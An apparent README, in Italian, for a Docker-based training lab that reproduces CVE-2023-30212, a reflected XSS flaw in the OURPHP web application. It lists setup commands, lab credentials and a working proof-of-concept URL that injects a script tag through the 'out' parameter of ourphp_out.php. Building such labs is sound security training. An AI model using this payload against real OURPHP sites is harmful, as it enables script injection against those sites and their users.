
Ambiente vulnerabile basato su Docker per esercitarsi nello sfruttamento di CVE-2023-30212, con un'app web OURPHP con una vulnerabilità XSS riflessa per la formazione sulla sicurezza.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
ora per impostare l'immagine docker
usa il comando sudo docker build -t work .
usa il comando sudo docker run -d -p 80:80 work
ora otterremo l'id del container
vai sul browser e cerca localhost ; 127.0.0.1
ora usa le credenziali
username : root
password : docker
database : work
username : work password : work
vai all'url http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
otterremo un messaggio di alert "xss".